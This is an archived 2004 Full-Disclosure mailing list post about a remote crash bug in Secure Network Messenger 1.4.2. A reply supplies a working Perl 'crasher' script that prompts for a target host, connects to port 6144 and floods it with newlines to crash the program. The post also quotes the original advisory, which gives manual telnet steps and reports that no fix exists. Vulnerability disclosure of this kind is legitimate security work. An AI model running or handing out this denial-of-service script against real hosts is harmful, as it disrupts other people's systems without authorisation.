| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <001101c4c9d3$d08276f0$647ba8c0@rbcutl65tbc0s8>
Date: Sat, 13 Nov 2004 23:54:54 +0100
From: "r`Futile" <clearscreen@...antrope.com>
To: <bugtraq@...urityfocus.com>, <bugs@...uritytracker.com>,
<news@...uriteam.com>, <full-disclosure@...ts.netsys.com>,
<vuln@...unia.com>
Subject: Re: Crash in Secure Network Messenger 1.4.2
And here is my proof of concept:
#!/usr/bin/perl
use IO::Socket;
print ("\nSecure Network Messenger Crasher by ClearScreen\n");
print ("\nEnter host to crash: ");
$h = <STDIN>;
chomp $h;
$socks = IO::Socket::INET->new(
Proto => "tcp",
PeerPort => "6144",
PeerAddr => "$h"
) or die "\nNo response from host.";
sleep 1;
print "\nSuccesfully connected to $h!\n";
for ($count=1; $count<15; $count++)
{
print $socks "\n";
select(undef, undef, undef, 0.1);
}
print "\nMessenger crashed.";
close $socks;
Greetz, clearscreen :)
----- Original Message -----
From: "Luigi Auriemma" <aluigi@...istici.org>
To: <bugtraq@...urityfocus.com>; <bugs@...uritytracker.com>;
<news@...uriteam.com>; <full-disclosure@...ts.netsys.com>;
<vuln@...unia.com>
Sent: Friday, November 12, 2004 9:52 PM
Subject: Crash in Secure Network Messenger 1.4.2
>
> #######################################################################
>
> Luigi Auriemma
>
> Application: Secure Network Messenger
> http://www.networkmessengers.com/msg/
> Versions: <= 1.4.2
> Platforms: Windows
> Bug: crash
> Exploitation: remote
> Date: 12 November 2004
> Author: Luigi Auriemma
> e-mail: aluigi@...ervista.org
> web: http://aluigi.altervista.org
>
>
> #######################################################################
>
>
> 1) Introduction
> 2) Bug
> 3) The Code
> 4) Fix
>
>
> #######################################################################
>
> ===============
> 1) Introduction
> ===============
>
>
> Secure Network Messenger is a LAN messenger for Windows for exchanging
> encrypted messages and files.
>
>
> #######################################################################
>
> ======
> 2) Bug
> ======
>
>
> Is possible to crash the program sending malformed data.
>
>
> #######################################################################
>
> ===========
> 3) The Code
> ===========
>
>
> Launch a telnet client and connect to the victim host on port 6144.
> Now press RETURN about 10 times or more.
> Disconnect, reconnect again and press RETURN.
> The remote host should be crashed.
>
>
> #######################################################################
>
> ======
> 4) Fix
> ======
>
>
> No fix.
> Over one month ago the developers said that they had to fix this bug
> soon... no patch has been released yet.
>
>
> #######################################################################
>
>
> ---
> Luigi Auriemma
> http://aluigi.altervista.org
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists